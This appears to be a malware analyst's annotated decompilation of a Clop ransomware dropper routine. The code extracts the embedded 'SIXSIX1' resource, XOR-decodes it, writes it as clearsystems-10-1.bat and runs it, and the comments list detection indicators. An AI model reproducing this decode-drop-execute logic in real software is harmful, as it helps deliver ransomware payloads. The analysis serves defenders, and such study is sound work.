Decompiled / reverse-engineered Clop routine that deobfuscates and runs the SIXSIX1 resource
/*
 * Decompiled dropper routine (Hex-Rays-style output; the register and
 * stack-offset notes on the locals are the decompiler's own).
 *
 * What the visible code does:
 *   1. Finds the resource named "SIXSIX1" (integer resource type 0xF447) in
 *      the running module and copies it into a zero-initialised global buffer.
 *   2. Deobfuscates that copy in place with a repeating XOR key
 *      (charArrMagicStr, indexed modulo 0x42, i.e. a 66-byte key; the key
 *      bytes themselves are defined outside this listing).
 *   3. Writes the result to "<current directory>\clearsystems-10-1.bat".
 *   4. Launches it through ShellExecuteA("open") and returns that HINSTANCE.
 *
 * No API return value is checked (FindResourceW, LoadResource, LockResource,
 * GlobalAlloc, WriteFile); a NULL/failure from any of them flows straight
 * into the next call. That is a property of the sample, recorded here for
 * analysts, not something to "fix" in a decompilation.
 *
 * Defender notes: the drop location is the process's current working
 * directory, the file name is fixed, and "open" on a .bat is normally
 * serviced by a cmd.exe child of this process — all stable detection points
 * for this stage.
 */
HINSTANCE LoadExecuteClearSystemsBatchFile()
{
HMODULE hModule; // eax
HMODULE phModule; // ebx
HRSRC hRsrcSIXSIX1; // eax
HRSRC phRsrcSIXSIX1; // esi
HGLOBAL hGlobalRsrcSIXSIX1; // eax
const void *ResourceLock; // edi
DWORD cbResourceSIXSIX1; // esi
HGLOBAL hDecryptedResourceMemory; // ebx
DWORD pcbResourceSIXSIX1; // edi
DWORD i; // esi
HANDLE hDecryptedFile; // esi
DWORD NumberOfBytesWritten; // [esp+Ch] [ebp-214h]
DWORD nNumberOfBytesToWrite; // [esp+10h] [ebp-210h]
// The two CHAR locals below are the decompiler's view of two stack buffers;
// the gap between them (0x20C - 0x108 = 0x104 = 260 bytes) matches the
// MAX_PATH-sized writes made into them further down.
CHAR currentPath; // [esp+14h] [ebp-20Ch]
CHAR FileName; // [esp+118h] [ebp-108h]
// Own module (the dropper itself carries the payload as a resource).
hModule = GetModuleHandleW(0);
phModule = hModule;
// 0xF447 is an integer (MAKEINTRESOURCE-style) resource type, not a string;
// "SIXSIX1" is the resource name -- both are usable as static indicators.
hRsrcSIXSIX1 = FindResourceW(hModule, (LPCWSTR)0xF447, L"SIXSIX1");
phRsrcSIXSIX1 = hRsrcSIXSIX1;
hGlobalRsrcSIXSIX1 = LoadResource(phModule, hRsrcSIXSIX1);
ResourceLock = LockResource(hGlobalRsrcSIXSIX1);
cbResourceSIXSIX1 = SizeofResource(phModule, phRsrcSIXSIX1);
nNumberOfBytesToWrite = cbResourceSIXSIX1; // stored but never read afterwards
// Private, zeroed copy so the mapped resource itself is never modified.
// GlobalAlloc's result is not checked before memmove.
hDecryptedResourceMemory = GlobalAlloc(GMEM_ZEROINIT, cbResourceSIXSIX1);
memmove(hDecryptedResourceMemory, ResourceLock, cbResourceSIXSIX1);
pcbResourceSIXSIX1 = cbResourceSIXSIX1;
// Repeating-key XOR over the whole copy; key period is 0x42 (66) bytes.
for ( i = 0; i < pcbResourceSIXSIX1; ++i )
*((_BYTE *)hDecryptedResourceMemory + i) ^= charArrMagicStr[i % 0x42];
// 260 == MAX_PATH. The drop path is <cwd>\clearsystems-10-1.bat: a fixed
// file name, so it is a reliable file-system indicator for this sample.
GetCurrentDirectoryA(260u, &currentPath);
wsprintfA(&FileName, "%s\\clearsystems-10-1.bat", &currentPath);
NumberOfBytesWritten = 0;
// CreateFileA(path, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS,
//             FILE_ATTRIBUTE_NORMAL, NULL); (HANDLE)-1 is INVALID_HANDLE_VALUE.
hDecryptedFile = CreateFileA(&FileName, 0x40000000u, 2u, 0, 4u, 0x80u, 0);
if ( hDecryptedFile != (HANDLE)-1 )
{
// Single write of the decoded buffer; neither the result nor the byte
// count is examined.
WriteFile(hDecryptedFile, hDecryptedResourceMemory, pcbResourceSIXSIX1, &NumberOfBytesWritten, 0);
CloseHandle(hDecryptedFile);
}
// Buffer is released before execution: the decoded payload only persists on disk.
GlobalFree(hDecryptedResourceMemory);
// Unconditional: runs even when CreateFileA failed above (the target may then
// be missing or stale). The "open" verb on a .bat is what hands control to
// the command interpreter.
return ShellExecuteA(0, "open", &FileName, 0, 0, 0);
}
@danzek

commented Apr 3, 2019
